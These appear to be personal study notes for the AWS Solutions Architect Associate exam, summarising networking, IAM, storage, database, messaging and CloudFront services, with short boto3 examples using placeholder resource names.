  • NACL is a firewall rule list which allows or denies traffic to and from a subnet
  • NACL’s are attached at the subnet level
  • NACL’s are stateless, meaning an inbound rule needs to have a matching outbound rule
  • Security groups are a firewall rule list that controls traffic to and from an EC2 instance
  • Security groups can only contain allow rules
  • Security group rules can contain IP addresses/ranges or other Security Groups

VPC Flow Logs

  • Flow logs log traffic into a VPC, subnet, or Elastic Network Interface
  • 3 Types of flow logs
    • VPC Flow Logs
    • Subnet Flow Logs
    • ENI Flow Logs
  • Log data can be sent to S3, CloudWatch Logs, and Kinesis Data Firehose

VPC Peering

  • Connect two VPCs privately over the AWS backbone network
  • The two VPCs must not have overlapping CIDR blocks
  • VPC peering is not transitive

VPC Endpoints

  • Endpoints allow you to connect to AWS Services using a private network instead of the public network
  • Gives you enhanced security and lower latency accessing AWS services

Site-to-Site VPN

  • Establish an encrypted VPN connection between AWS and on-premises
  • Goes over the public internet

Direct Connect

  • Establish a physical connection between AWS and on-premises
  • Goes over a private network
  • Requires infrastructure to be put in place

AWS-Solutions-Architect-Associate-notes

This is a collection of study material that follows the exam guide for the AWS Certified Solutions Architect - Associate (SAA-C03) exam.

Exam Guide

Domain                                            % of Exam
Domain 1: Design Secure Architectures             30%
Domain 2: Design Resilient Architectures          26%
Domain 3: Design High-Performing Architectures    24%
Domain 4: Design Cost-Optimized Architectures     20%
TOTAL                                             100%

AWS Certified Solutions Architect Associate Practice Exams

Metadata

  • Title: AWS Certified Solutions Architect Associate Practice Exams
  • URL: https://www.udemy.com/course/aws-certified-solutions-architect-associate-amazon-practice-exams-saa-c03/learn/quiz/4394972/result/1100741372

Highlights & Notes

  • In Auto Scaling, the following statements are correct regarding the cooldown period: It ensures that the Auto Scaling group does not launch or terminate additional EC2 instances before the previous scaling activity takes effect. Its default value is 300 seconds. It is a configurable setting for your Auto Scaling group.

  • You can use Amazon Data Lifecycle Manager (Amazon DLM) to automate the creation, retention, and deletion of snapshots taken to back up your Amazon EBS volumes. Automating snapshot management helps you to: - Protect valuable data by enforcing a regular backup schedule. - Retain backups as required by auditors or internal compliance. - Reduce storage costs by deleting outdated backups.

  • AWS Global Accelerator and Amazon CloudFront are separate services that use the AWS global network and its edge locations around the world. CloudFront improves performance for both cacheable content (such as images and videos) and dynamic content (such as API acceleration and dynamic site delivery). Global Accelerator improves performance for a wide range of applications over TCP or UDP by proxying packets at the edge to applications running in one or more AWS Regions. Global Accelerator is a good fit for non-HTTP use cases, such as gaming (UDP), IoT (MQTT), or Voice over IP, as well as for HTTP use cases that specifically require static IP addresses or deterministic, fast regional failover. Both services integrate with AWS Shield for DDoS protection.

  • A Gateway endpoint is a type of VPC endpoint that provides reliable connectivity to Amazon S3 and DynamoDB without requiring an internet gateway or a NAT device for your VPC. Instances in your VPC do not require public IP addresses to communicate with resources in the service.

  • AWS DataSync makes it simple and fast to move large amounts of data online between on-premises storage and Amazon S3, Amazon Elastic File System (Amazon EFS), or Amazon FSx for Windows File Server. Manual tasks related to data transfers can slow down migrations and burden IT operations. DataSync eliminates or automatically handles many of these tasks, including scripting copy jobs, scheduling, and monitoring transfers, validating data, and optimizing network utilization. The DataSync software agent connects to your Network File System (NFS), Server Message Block (SMB) storage, and your self-managed object storage, so you don’t have to modify your applications. DataSync can transfer hundreds of terabytes and millions of files at speeds up to 10 times faster than open-source tools, over the Internet or AWS Direct Connect links. You can use DataSync to migrate active data sets or archives to AWS, transfer data to the cloud for timely analysis and processing, or replicate data to AWS for business continuity. Getting started with DataSync is easy: deploy the DataSync agent, connect it to your file system, select your AWS storage resources, and start moving data between them. You pay only for the data you move.

  • Here is a list of important information about EBS Volumes:

    • When you create an EBS volume in an Availability Zone, it is automatically replicated within that zone to prevent data loss due to a failure of any single hardware component.

    • An EBS volume can only be attached to one EC2 instance at a time.

    • After you create a volume, you can attach it to any EC2 instance in the same Availability Zone

    • An EBS volume is off-instance storage that can persist independently from the life of an instance. You can specify not to terminate the EBS volume when you terminate the EC2 instance during instance creation.

    • EBS volumes support live configuration changes while in production which means that you can modify the volume type, volume size, and IOPS capacity without service interruptions.

    • Amazon EBS encryption uses 256-bit Advanced Encryption Standard algorithms (AES-256)

    • EBS Volumes offer 99.999% SLA.

Amazon EBS


  • Amazon EBS provides three volume types to best meet the needs of your workloads:

    • General Purpose (SSD)
      • General Purpose (SSD) volumes are suitable for a broad range of workloads, including small to medium-sized databases, development and test environments, and boot volumes.
    • Provisioned IOPS (SSD)
      • These volumes offer storage with consistent and low-latency performance and are designed for I/O intensive applications such as large relational or NoSQL databases.
    • Magnetic
      • for workloads where data are accessed infrequently, and applications where the lowest storage cost is important.

Cloudwatch


  • Monitoring tool for your AWS resources and applications.
  • Display metrics and create alarms that watch the metrics and send notifications or automatically make changes to the resources you are monitoring when a threshold is breached.

AWS Identity and Access Management


  • You should always associate an IAM role with EC2 instances (not IAM user credentials) for the purpose of accessing other AWS services

  • IAM roles are designed so that your applications can securely make API requests from your instances, without requiring you to manage the security credentials that the applications use.

    • Instead of creating and distributing your AWS credentials, you can delegate permission to make API requests using IAM roles
  • AWS Organizations is a service that allows you to manage multiple AWS accounts easily.

  • AWS IAM Identity Center can be integrated with your corporate directory service for centralized authentication.

    • This means you can sign in to multiple AWS accounts with just one set of credentials.
    • This integration helps to streamline the authentication process and makes it easier for companies to switch between accounts.
  • SCPs: you can also configure a service control policy (SCP) to manage your AWS accounts.

    • SCPs help you enforce policies across your organization and control the services and features accessible to your member accounts.
    • prevents unauthorized access
  • Security Token Service (STS) is the service that you can use to create and provide trusted users with temporary security credentials that can control access to your AWS resources.

    • Temporary security credentials work almost identically to the long-term access key credentials that your IAM users can use.
  • AWS Control Tower provides a single location to easily set up your new well-architected multi-account environment and govern your AWS workloads with rules for security, operations, and internal compliance.

    • You can automate the setup of your AWS environment with best-practices blueprints for multi-account structure, identity, access management, and account provisioning workflow.
    • offers “guardrails” for ongoing governance of your AWS environment.
  • You can use an IAM role to specify permissions for users whose identity is federated from your organization or a third-party identity provider (IdP).

    • Federating users with SAML 2.0
      • If your organization already uses an identity provider software package that supports SAML 2.0 (Security Assertion Markup Language 2.0), you can create trust between your organization as an identity provider (IdP) and AWS as the service provider.
      • You can then use SAML to provide your users with federated single sign-on (SSO) to the AWS Management Console or federated access to call AWS API operations.
      • For example: if your company uses Microsoft Active Directory and Active Directory Federation Services, then you can federate using SAML 2.0
    • Federating users by creating a custom identity broker application
      • If your identity store is not compatible with SAML 2.0, then you can build a custom identity broker application to perform a similar function.

      • The broker application authenticates users, requests temporary credentials for users from AWS, and then provides them to the user to access AWS resources.

      • The application verifies that employees are signed into the existing corporate network’s identity and authentication system, which might use LDAP, Active Directory, or another system. The identity broker application then obtains temporary security credentials for the employees.

      • To get temporary security credentials, the identity broker application calls either AssumeRole or GetFederationToken to obtain temporary security credentials, depending on how you want to manage the policies for users and when the temporary credentials should expire.

      • The call returns temporary security credentials consisting of an AWS access key ID, a secret access key, and a session token. The identity broker application makes these temporary security credentials available to the internal company application.

      • This scenario has the following attributes:

        • The identity broker application has permissions to access IAM’s token service (STS) API to create temporary security credentials.

        • The identity broker application is able to verify that employees are authenticated within the existing authentication system.

        • Users are able to get a temporary URL that gives them access to the AWS Management Console (which is referred to as single sign-on).
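
To make the identity-broker flow concrete, here is a minimal boto3 sketch of the STS call that returns temporary credentials. The role ARN and session name are placeholders; a real broker would call AssumeRole or GetFederationToken only after authenticating the user against the corporate directory.

```python
import boto3

sts = boto3.client("sts")

# Request temporary security credentials for a federated user
# (placeholder role ARN; the broker chooses AssumeRole or GetFederationToken).
response = sts.assume_role(
    RoleArn="arn:aws:iam::123456789012:role/FederatedAppRole",
    RoleSessionName="employee-jdoe",
    DurationSeconds=3600,
)

creds = response["Credentials"]

# Use the temporary access key, secret key, and session token.
session = boto3.Session(
    aws_access_key_id=creds["AccessKeyId"],
    aws_secret_access_key=creds["SecretAccessKey"],
    aws_session_token=creds["SessionToken"],
)
print(session.client("sts").get_caller_identity()["Arn"])
```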

RDS


  • Supports Aurora, MySQL, MariaDB, PostgreSQL, Oracle, Microsoft SQL Server.
  • DB Instance
    • For production OLTP use cases, use Multi-AZ deployments for enhanced fault tolerance with Provisioned IOPS storage for fast and predictable performance.
      • You can use PIOPS storage with Read Replicas for MySQL, MariaDB or PostgreSQL.
    • Magnetic
      • Doesn’t allow you to scale storage when using the SQL Server database engine.
        • Doesn’t support elastic volumes.
        • Limited to a maximum size of 3 TiB.
        • Limited to a maximum of 1,000 IOPS.
  • RDS automatically performs a failover in the event of any of the following:
    1. Loss of availability in primary Availability Zone.
    2. Loss of network connectivity to primary.
    3. Compute unit failure on primary.
    4. Storage failure on primary.

Athena


  • An interactive query service that makes it easy to analyze data directly in Amazon S3 and other data sources using SQL.
  • Serverless
  • Has a built-in query editor.
  • highly available and durable
  • integrates with Amazon QuickSight for easy data visualization.
  • retains query history for 45 days.
  • You pay only for the queries that you run. You are charged based on the amount of data scanned by each query.
  • There are 2 types of cost controls:
    • Per-query limit
      • specifies a threshold for the total amount of data scanned per query.
      • Any query running in a workgroup is canceled once it exceeds the specified limit.
      • Only one per-query limit can be created
    • Per-workgroup limit
      • this limits the total amount of data scanned by all queries running within a specific time frame.
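
The per-query cost control described above maps to the BytesScannedCutoffPerQuery setting on a workgroup. A minimal boto3 sketch (bucket and workgroup names are placeholders):

```python
import boto3

athena = boto3.client("athena")

# Create a workgroup whose queries are cancelled once they scan more
# than 10 GB of data (per-query limit).
athena.create_work_group(
    Name="analysts",
    Configuration={
        "ResultConfiguration": {"OutputLocation": "s3://example-athena-results/"},
        "BytesScannedCutoffPerQuery": 10 * 1024**3,  # 10 GB in bytes
        "EnforceWorkGroupConfiguration": True,
    },
)
```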

Kinesis


  • Kinesis Video Streams is a fully managed AWS service that you can use to stream live video from devices to the AWS Cloud, or build applications for real-time video processing or batch-oriented video analytics.
  • Amazon Kinesis Data Streams enables real-time processing of streaming big data. It provides ordering of records, as well as the ability to read and/or replay records in the same order to multiple Amazon Kinesis Applications
  • A Kinesis data stream is a set of shards that holds a sequence of data records, and each data record has a sequence number that is assigned by Kinesis Data Streams.
    • Kinesis can also easily handle a high volume of messages being sent to the service.
    • Durable
    • No message loss
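
A minimal producer sketch with boto3: the stream name and partition key are placeholders; records with the same partition key land on the same shard and keep their ordering.

```python
import json
import boto3

kinesis = boto3.client("kinesis")

event = {"order_id": "o-1001", "amount": 42.50}

# Put one record; the partition key determines the target shard,
# and Kinesis assigns the sequence number.
response = kinesis.put_record(
    StreamName="orders-stream",          # placeholder stream name
    Data=json.dumps(event).encode("utf-8"),
    PartitionKey=event["order_id"],
)
print(response["ShardId"], response["SequenceNumber"])
```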

DynamoDB

  • How to choose the right partition key?

    • What is a partition key?
      • DynamoDB supports 2 types of primary keys
        • Partition key: A simple primary key, composed of one attribute known as the partition key.
        • Partition key and Sort key: Referred to as a composite primary key, this type of key is composed of two attributes: the first is the partition key and the second is the sort key.
    • Why do I need a partition key?
      • DynamoDB stores data as groups of attributes, known as items.
      • Items are similar to rows or records in other database systems.
      • DynamoDB stores and retrieves each item based on the primary key value which must be unique
      • DynamoDB uses the partition key’s value as an input to an internal hash function. The output from the hash function determines the partition in which the item is stored. Each item’s location is determined by the hash value of its partition key.
    • DynamoDB automatically supports your access patterns using the throughput you have provisioned, or up to your account limits in on-demand mode
    • Regardless of the capacity mode you choose, if your access pattern exceeds 3000 RCU or 1000 WCU for a single partition key value, your requests might be throttled with a ProvisionedThroughputExceededException error
    • Recommended for Partition keys :
      • Use high-cardinality attributes. These are attributes that have distinct values for each item, like emailid, employee_no, customerid, sessionid, orderid
      • Use composite attributes: try to combine more than one attribute to form a unique key, if that meets your access pattern
      • Cache the popular items when there is high volume of read traffic using DAX (DynamoDB Accelerator)
      • DAX is fully managed, in-memory cache for DynamoDB that doesn’t require developers to manage cache invalidation, data population or cluster management.
      • DAX is also compatible with DynamoDB API calls, so developers can incorporate it more easily into existing applications
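
To illustrate the composite primary key described above, here is a minimal boto3 sketch that creates a table with a high-cardinality partition key and a sort key. Table and attribute names are placeholders.

```python
import boto3

dynamodb = boto3.client("dynamodb")

# Composite primary key: customer_id (partition key) + order_id (sort key).
dynamodb.create_table(
    TableName="Orders",
    AttributeDefinitions=[
        {"AttributeName": "customer_id", "AttributeType": "S"},
        {"AttributeName": "order_id", "AttributeType": "S"},
    ],
    KeySchema=[
        {"AttributeName": "customer_id", "KeyType": "HASH"},   # partition key
        {"AttributeName": "order_id", "KeyType": "RANGE"},     # sort key
    ],
    BillingMode="PAY_PER_REQUEST",  # on-demand capacity mode
)
```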

Storage Gateway


  • Connects an on-premise software appliance with cloud-based storage to provide seamless integration with data security features between your on-premises IT environment and the AWS storage infrastructure.

  • You can use the service to store data in the AWS cloud for scalable and cost-effective storage that helps maintain data security.

  • It stores files as native S3 objects, archives virtual tapes in Amazon Glacier and stores EBS snapshots generated by the Volume Gateway with Amazon EBS.

Elastic Load Balancer


  • Distributes incoming application or network traffic across multiple targets, such as EC2 instances, containers (ECS), Lambda functions and IP addresses, in multiple Availability Zones

Security Group


  • A security group acts as a virtual firewall for your instance to control inbound and outbound traffic.

Route 53


  • A highly available and scalable Domain Name System (DNS) web service used for domain registration, DNS routing and health checking

AWS Transit Gateway


  • A networking service that uses a hub-and-spoke model to connect on-premises data centers and Amazon VPCs to a single gateway.
  • With this service, customers only have to create and manage a single connection from the central gateway into each on-premises data center
  • Features:
    • Inter-region peering
      • allows customers to route traffic between Transit Gateways in different AWS Regions
      • an easy and cost-effective way to connect Regions
    • Multicast
      • allows customers to have fine-grain control on who can consume and produce multicast traffic
    • Automated provisioning
      • customers can automatically identify the Site-to-site VPN connections and on-premises resources with which they are associated using AWS Transit Gateway

Amazon EMR


  • EMR (Elastic MapReduce)

  • A managed cluster that simplifies running big data frameworks like Apache Hadoop and Apache Spark on AWS to process and analyze vast amounts of data.

  • You can process data for analytics purposes and business intelligence workloads using EMR together with Apache Hive and Apache Pig

  • You can use EMR to move large amounts of data in and out of other AWS data stores and databases like S3 and DynamoDB

  • Purchasing options:

    • On-Demand: reliable, predictable, won’t be terminated
    • Reserved (min 1 year): cost savings (EMR will automatically use if available)

Auto Scaling


  • Configure automatic scaling for AWS resources quickly through a scaling plan that uses Dynamic Scaling and Predictive Scaling.
  • Useful for:
    • Cyclical traffic, such as high use of resources during regular business hours and low use of resources overnight
    • On-and-off traffic, such as batch processing, testing and periodic analysis
    • Variable traffic patterns, such as software for marketing growth with periods of spiky growth
  • Dynamic Scaling
    • To add and remove capacity for resources to maintain resource at target value
  • Predictive Scaling
    • To forecast the future load demands by analyzing your historical records for a metric
    • Allows scheduled scaling by adding or removing capacity, and controls maximum capacity
    • Only available for EC2 scaling groups
  • In Auto Scaling, the following statements are correct regarding the cooldown period:
    • It ensures that the Auto Scaling group does not launch or terminate additional EC2 instances before the previous scaling activity takes effect.
    • Its default value is 300 seconds.
    • It is a configurable setting for your Auto Scaling group.

S3


  • Server-side encryption (SSE) is about data encryption at rest; that is, Amazon S3 encrypts your data at the object level as it writes it to disks in its data centers and decrypts it for you when you access it.
    • You have three mutually exclusive options depending on how you choose to manage the encryption keys:

      1. Amazon S3-Managed Keys (SSE-S3)

      2. AWS KMS-Managed Keys (SSE-KMS)

      3. Customer-Provided Keys (SSE-C)

    • S3-Managed Encryption Keys (SSE-S3)

      • Amazon S3 will encrypt each object with a unique key and, as an additional safeguard, it encrypts the key itself with a master key that it rotates regularly.
      • S3 handles the keys and uses the AES-256 algorithm (256-bit Advanced Encryption Standard), one of the strongest block ciphers available, to encrypt your data.
  • Client-side Encryption using
    1. AWS KMS-managed customer master key
    2. client-side master key
  • Cross-Account Access: you can provide another AWS account access to an object that is stored in an S3 bucket.
    • These are the methods on how to grant cross-account access to objects that are stored in your own Amazon S3 bucket:

      • Resource-based policies and IAM policies
      • Resource-based Access Control List (ACL) and IAM policies
    • Cross-account IAM roles for programmatic and console access to S3 bucket objects

    • Supports failover controls for S3 Multi-Region access points.

  • Requester Pays Buckets
    • Normally, bucket owners pay for all of the Amazon S3 storage and data transfer costs associated with their bucket; with Requester Pays enabled, the requester pays the request and data download costs, while the bucket owner still pays for storage.
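
A minimal boto3 sketch showing the server-side encryption options above on upload; bucket, key, and KMS alias are placeholders.

```python
import boto3

s3 = boto3.client("s3")

# SSE-S3: S3 manages the keys (AES-256).
s3.put_object(
    Bucket="example-bucket",
    Key="reports/report.csv",
    Body=b"col1,col2\n1,2\n",
    ServerSideEncryption="AES256",
)

# SSE-KMS: encrypt with a KMS key you control (placeholder alias).
s3.put_object(
    Bucket="example-bucket",
    Key="reports/report-kms.csv",
    Body=b"col1,col2\n1,2\n",
    ServerSideEncryption="aws:kms",
    SSEKMSKeyId="alias/example-s3-key",
)
```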

CloudFront


Secrets Manager


  • Helps to manage, retrieve and rotate database credentials, application credentials, OAuth tokens, API keys and other secrets throughout their lifecycles
  • Helps to improve your security posture, because you no longer need hard-coded credentials in application source code.
    • Storing the credentials in Secrets Manager helps avoid possible compromise by anyone who can inspect the application or its components.
    • Replace hard-coded credentials with a runtime call to the Secrets Manager service to retrieve credentials dynamically when you need them.
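
The runtime call mentioned above looks roughly like this with boto3; the secret name is a placeholder and the secret value is assumed to be a JSON string.

```python
import json
import boto3

secrets = boto3.client("secretsmanager")

# Retrieve the credentials at runtime instead of hard-coding them.
response = secrets.get_secret_value(SecretId="prod/app/db-credentials")
credentials = json.loads(response["SecretString"])

db_user = credentials["username"]
db_password = credentials["password"]
```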

Textract


  • A fully managed document analysis service for detecting and extracting information from scanned documents
  • Returns extracted data as key-value pairs (e.g. Name: John Doe)
  • Supports virtually any type of document
  • Pricing
    • Pay for what you use
    • Charges differ between the Detect Document Text API and the Analyze Document API, with the latter being more expensive

RPO and RTO


  • RTO (Recovery Time Objective)
    • measures how quickly the application should be available again after an outage
  • RPO (Recovery Point Objective)
    • refers to how much data loss the application can tolerate
  • Data loss is measured from the most recent backup to the point of disaster. Downtime is measured from the point of disaster until the system is fully recovered and available for service.

EC2



Network Firewall


  • AWS Network Firewall supports domain name stateful network traffic inspection
  • Can create allow lists and deny lists with domain names that the stateful rules engine looks for in network traffic
  • AWS Network Firewall is a stateful, managed network firewall and intrusion detection and prevention service for your virtual private cloud (VPC) that you created in Amazon Virtual Private Cloud (Amazon VPC).
    • With Network Firewall, you can filter traffic at the perimeter of your VPC.
    • This includes filtering traffic going to and coming from an internet gateway, NAT gateway, or over VPN or AWS Direct Connect.
  • Network Firewall uses the open source intrusion prevention system (IPS), Suricata, for stateful inspection. Network Firewall supports Suricata compatible rules.

Security


  • The security pillar includes the ability to protect data, systems, and assets to take advantage of cloud technologies to improve security

  • Zero Trust security is a model where application components or microservices are considered discrete from each other and no component or microservice trusts any other.

    Design Principles

    1. Implement a strong identity foundation

    2. Enable traceability

    3. Apply security at all layers:

      • Apply a defense-in-depth approach with multiple security controls

      • Apply security at multiple layers (for example, edge of network, VPC, load balancing, every instance and compute service, operating system, application, and code).

    4. Automate security best practices:

    5. Protect data in transit and at rest:

    6. Keep people away from data:

    7. Prepare for security events:

Study-more

[ ] Spot Fleets
[ ] Reserved Instances vs. Dedicated Hosts

Tutorialsdojo Cheatsheets

Api-gateway-cheatsheet

  • Enables developers to create, publish, maintain, monitor, and secure APIs at any scale

  • Create RESTful or WebSocket APIs

  • HIPAA compliant service

  • Allows creating, deploying and managing a RESTful API to expose backend HTTP endpoints, Lambda functions or other AWS services

  • Concepts

    • API deployment
      • a point-in-time snapshot of your API Gateway API resource and methods. To be available for clients to use, the deployment must be associated with one or more API stages
    • API endpoints
      • host names for APIs in API Gateway, which are deployed to a specific region and have the format: rest-api-id.execute-api.region.amazonaws.com
    • Usage Plan
      • Provides selected API clients with access to one or more deployed APIs. You can use a usage plan to configure throttling and quota limits, which are enforced on individual client API keys
  • Features:

    • Amazon API Gateway provides throttling at multiple levels including global and by a service call. Throttling limits can be set for standard rates and bursts.
      • For example, API owners can set a rate limit of 1,000 requests per second for a specific method in their REST APIs, and also configure Amazon API Gateway to handle a burst of 2,000 requests per second for a few seconds.
  • Endpoint Types

    • Edge-optimized: For global clients
      • Requests are routed through a CloudFront Edge Location for improved latency
      • The API Gateway still only lives in one region
    • Regional: for clients within the same region
      • You could still manually combine with CloudFront for control over caching strategies
    • Private: Only accessible in our VPC
      • Use a resource policy to define access
  • Stages

    • Create stages for different deployments of the API. Example: Production, Sandbox, QA, etc.
    • Switch between stages seamlessly
    • Similar to Azure Web App Deployment Slots
    • Use stage variables
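
The throttling and usage-plan concepts above can be wired up with boto3 roughly as follows; the API ID, stage name, and limits are placeholders.

```python
import boto3

apigw = boto3.client("apigateway")

# Usage plan with a steady-state rate limit, a burst limit, and a monthly quota,
# attached to a deployed stage of a REST API (placeholder IDs).
apigw.create_usage_plan(
    name="gold-tier",
    apiStages=[{"apiId": "abc123defg", "stage": "prod"}],
    throttle={"rateLimit": 1000.0, "burstLimit": 2000},
    quota={"limit": 1_000_000, "period": "MONTH"},
)
```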

Queueing (SQS)



  • What is a Messaging System ?

    • Used to provide asynchronous communication and decouple processes via messages / events from sender and receiver (producer and consumer)
  • What is a Queuing System ?

    • A queueing system is a messaging system that generally will delete messages once they are consumed .
    • Simple Communication
    • Not Real-time
    • Have to pull
    • Not reactive
  • Simple Queuing System (SQS)

    • Fully managed queuing service that enables you to decouple and scale microservices, distributed systems, and serverless applications
    • Use Case: You need to queue up transaction emails to be sent
    • e.g. Signup, Reset Password
    • Default retention 4 Days and Max of 14 days
    • Limitation of 256 KB per message sent
    • Low Latency (<10ms on publish and receive)
    • Can have duplicate messages (at least once delivery, occasionally)
    • Unlimited Throughput
    • Encryption:
      • In-flight encryption using HTTPS API
      • At-rest encryption using KMS keys
      • Client-side encryption if the client wants to perform encryption/decryption itself

SQS Message Visibility Timeout


  • After a message is polled by a consumer, it becomes invisible to other consumers
  • By default the “message visibility timeout” is 30 seconds
  • That means the message has 30 seconds to be processed
  • If the message is not processed within the visibility timeout, it becomes visible again and may be processed twice
  • A consumer can call the ChangeMessageVisibility API to get more time
  • If the visibility timeout is high (hours) and the consumer crashes, reprocessing will take time
  • If the visibility timeout is too low (seconds), we may get duplicates
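
A minimal boto3 sketch of a consumer extending the visibility timeout while it is still working on a message; the queue URL is a placeholder.

```python
import boto3

sqs = boto3.client("sqs")
queue_url = "https://sqs.us-east-1.amazonaws.com/123456789012/example-queue"

messages = sqs.receive_message(QueueUrl=queue_url, MaxNumberOfMessages=1)

for msg in messages.get("Messages", []):
    # Still processing? Ask for 10 more minutes before the message
    # becomes visible to other consumers again.
    sqs.change_message_visibility(
        QueueUrl=queue_url,
        ReceiptHandle=msg["ReceiptHandle"],
        VisibilityTimeout=600,
    )
```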

Long Polling


  • When a consumer requests messages from the queue, it can optionally ‘wait’ for messages to arrive if there are none in the queue - Long Polling
  • Long Polling decreases the number of API calls made to SQS and increases the efficiency of the application; an individual receive call may wait longer (higher latency) when the queue is empty
  • The wait time can be between 1 second and 20 seconds
  • Long Polling is preferable to Short Polling
  • Long Polling can be enabled at the queue level or at the API level using WaitTimeSeconds
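
A minimal boto3 sketch of long polling at the API level using WaitTimeSeconds (queue URL is a placeholder); the same behaviour can be enabled queue-wide via the ReceiveMessageWaitTimeSeconds attribute.

```python
import boto3

sqs = boto3.client("sqs")
queue_url = "https://sqs.us-east-1.amazonaws.com/123456789012/example-queue"

# Wait up to 20 seconds for messages instead of returning immediately.
response = sqs.receive_message(
    QueueUrl=queue_url,
    MaxNumberOfMessages=10,
    WaitTimeSeconds=20,   # long polling
)

for msg in response.get("Messages", []):
    print(msg["Body"])
    sqs.delete_message(QueueUrl=queue_url, ReceiptHandle=msg["ReceiptHandle"])
```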

Streaming and Kinesis


  • What is Streaming ?

    • Multiple consumers can react to events (messages)

    • Events live in the stream for long periods of time, so complex operations can be applied

    • Real-time

    • Amazon-Kinesis

      • Amazon Kinesis is the AWS fully managed solution for collecting, processing and analyzing streaming data in the cloud

    Kinesis Data Streams

    • Capture,process and store data streams
      • Security:

        • Control access/ authorization using IAM policies
        • Encryption in flight using HTTPS endpoints
        • Encryption at rest using KMS
        • You can implement encryption/decryption of data on client-side (harder)
        • VPC endpoints available for Kinesis to access within VPC
        • Monitor API calls using CloudTrail

    Kinesis Data Firehose

    • load data streams into AWS data stores
    • Pay for only data that is going through Firehose
    • Supports many data formats, conversions, transformations, compression

    Kinesis Data Streams vs Firehose

    • Kinesis Data Streams
      • Streaming service for ingest at scale
      • Write custom code (producer/consumer)
      • Real-time (~200 ms)
      • Managed scaling (shard splitting / merging)
      • Data storage for 1 to 365 days
      • Supports replay capability
    • Kinesis Data Firehose
      • Load streaming data into S3 / Redshift / OpenSearch / 3rd party / custom HTTP
      • Fully managed
      • Near real-time (buffer time minimum 60 seconds)
      • Automatic scaling
      • No data storage
      • Doesn’t support replay capability

    Kinesis Data Analytics

    • analyze data streams with SQL or Apache Flink

    Kinesis Video Streams

    • Capture, process and store video streams

Pub-Sub and SNS


  • What is Pub / Sub ?

    • Publish-subscribe pattern commonly implemented in messaging systems.

    • In a pub/sub system, the senders of messages (publishers) do not send their messages directly to receivers.

    • They instead send their messages to an event bus. The event bus categorizes the messages into groups.

    • The receivers of messages (subscribers) subscribe to these groups

    • Whenever new messages appear within their subscription, the messages are immediately delivered to them

    • Publishers have no knowledge of who their subscribers are

    • Subscribers do not pull for messages

    • Messages are instead automatically and immediately pushed to subscribers

    • Messages and events are interchangeable terms in pub/sub

    • Use case:

      • A real-time chat system
      • A web-hook system
  • Simple Notification Service

    • It is a highly available, durable, secure, fully managed pub/sub messaging service that enables you to decouple microservices, distributed systems and serverless applications

SQS and SNS - Fan Out Pattern


  • Push once in SNS, receive in all SQS queues that are subscribers
  • Fully decoupled: no data loss
  • SNS - Message Filtering
    • JSON policy used to filter messages sent to SNS topic’s subscriptions
    • If a subscription doesn’t have a filter policy, it receives every message
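
A minimal boto3 sketch of the fan-out pattern with a filter policy: one SNS topic, one SQS queue subscribed to it, and a filter so the queue only receives a subset of messages. Topic, queue, and attribute names are placeholders, and the SQS access policy that allows SNS to deliver to the queue is omitted for brevity.

```python
import json
import boto3

sns = boto3.client("sns")

topic_arn = sns.create_topic(Name="orders-topic")["TopicArn"]
queue_arn = "arn:aws:sqs:us-east-1:123456789012:billing-queue"  # placeholder

# Subscribe the queue to the topic; the filter policy means this queue
# only receives messages whose 'order_type' attribute is 'purchase'.
sns.subscribe(
    TopicArn=topic_arn,
    Protocol="sqs",
    Endpoint=queue_arn,
    Attributes={
        "RawMessageDelivery": "true",
        "FilterPolicy": json.dumps({"order_type": ["purchase"]}),
    },
)

# Publish once; every subscribed queue whose filter matches gets a copy.
sns.publish(
    TopicArn=topic_arn,
    Message=json.dumps({"order_id": "o-1001"}),
    MessageAttributes={
        "order_type": {"DataType": "String", "StringValue": "purchase"}
    },
)
```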

Cloudfront-cheatsheet

  • CloudFront is a CDN (Content Distribution Network). It makes websites load faster by serving cached content that is nearby
  • CloudFront distributes cached copy at Edge Locations
  • Edge Locations aren’t read-only; you can also write to them, eg. PUT objects
  • TTL (Time to live) defines how long until the cache expires (refreshes cache)
  • When you invalidate your cache, you are forcing it to immediately expire (refreshes cached data)
  • Refreshing the cache costs money because of transfer costs to update Edge locations
  • Origin is the address of where the original copies of your files reside eg. S3, EC2, ELB, Route53
  • Distribution defines a collection of Edge Locations and behavior on how it should handle your cached content
  • Distributions have 2 types:
    • Web Distribution (static website content)
    • RTMP (streaming media)
  • Origin Access Identity (OAI) is used to access private S3 buckets
  • Access to cached content can be protected via Signed URLs or Signed Cookies
  • Lambda@Edge allows you to pass each request through a Lambda to change the behavior of the response

CloudFront



  • Content Distribution Network (CDN) creates cached copies of your website at various Edge locations around the world

  • Content Delivery Network (CDN)

    • A CDN is a distributed network of servers which delivers web pages and content to users based on their geographical location, the origin of the webpage and a content delivery server

      • Can be used to deliver an entire website, including static, dynamic and streaming content

      • 216 points of presence globally

      • DDoS protection since it is a global service. Integrates with AWS Shield and AWS WAF

      • Requests for content are served from the nearest Edge Location for the best possible performance


CloudFront Core Components


  • Origin

    • The location where all of original files are located. For example an S3 Bucket, EC2 Instance, ELB or Route53
  • Edge Location

    • The location where web content will be cached. This is different than an AWS Region or AZ
  • Distribution

    • A collection of Edge locations which defines how cached content should behave


CloudFront Distributions


  • A distribution is a collection of Edge Locations. You specify the Origin eg. S3, EC2, ELB, Route53
  • It replicates copies based on your Price Class
  • There are two types of Distributions
    1. Web (for Websites)
    2. RTMP (for streaming media)
  • Behaviors
    • Redirect to HTTPs, Restrict HTTP Methods, Restrict Viewer Access, Set TTLs
  • Invalidations
    • You can manually invalidate cache on specific files via Invalidations
  • Error Pages
    • You can serve up custom error pages eg 404
  • Restrictions
    • You can use Geo Restriction to blacklist or whitelist specific countries

Lambda@Edge


  • Lambda@Edge functions are used to override the behavior of request and responses

  • Lambda@Edge lets you run Lambda functions to customize the content that CloudFront delivers, executing the functions in AWS locations closer to the viewer.

  • The functions run in response to CloudFront events, without provisioning or managing servers. You can use Lambda functions to change CloudFront requests and responses at the following points:

  • The 4 Available Edge Functions

    1. Viewer Request
      • When CloudFront receives a request from a viewer
    2. Origin Request
      • Before CloudFront forwards a request to the origin
    3. Origin Response
      • When CloudFront receives a response from the origin
    4. Viewer Response
      • Before CloudFront returns the response to the viewer

CloudFront Protection


  • By Default a Distribution allows everyone to have access
  • Origin Access Identity (OAI)
    • A virtual user identity that is used to give your CloudFront Distribution permission to fetch a private object
  • In order to use Signed URLs or Signed Cookies, you need to have an OAI
  • Signed URLs
    • (Not the same thing as S3 presigned URLs)
      • A URL which provides temporary access to cached objects
  • Signed Cookies
    • A cookie which is passed along with the request to CloudFront. The advantage of using a cookie is that you can provide access to multiple restricted files, eg. video streaming
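
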